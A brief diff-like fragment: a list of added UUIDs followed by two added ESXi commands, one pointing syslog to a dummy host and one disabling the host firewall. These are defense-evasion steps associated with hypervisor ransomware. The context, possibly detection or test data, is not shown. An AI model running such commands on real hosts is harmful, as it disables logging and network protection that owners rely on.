+2d5029f0-ae20-446f-8811-e7511b58e8b6
+36c62584-d360-41d6-886f-d194654be7c2
+bac8a340-be64-4491-a0cc-0985cb227f5a
+fef0ace1-3550-4bf1-a075-9fea55a778dd
+8ce53049-5314-4279-b635-b69c5bed3a36
+f0287b58-f4bc-40f6-87eb-692e126e7f8f
+f1641ba9-919a-4323-b74f-33372333bf0e
+68254a85-aa42-4312-a695-38b7276307f8
+a9b93f17-31cb-435d-a462-5e838a2a6026
+3b0df731-030c-4768-b492-2a3216d90e53
+424e18fd-48b8-4201-8d3a-bf591523a686
+f095e373-b936-4eb4-8d22-f47ccbfbe64a
+b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+c7921449-8b62-4c4d-8a83-d9281ac0190b
+04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
				`@@ -0,0 +1 @@`
				`esxcli system syslog config set --loghost=0`
				`@@ -0,0 +1 @@`
				`esxcli network firewall set --enabled false`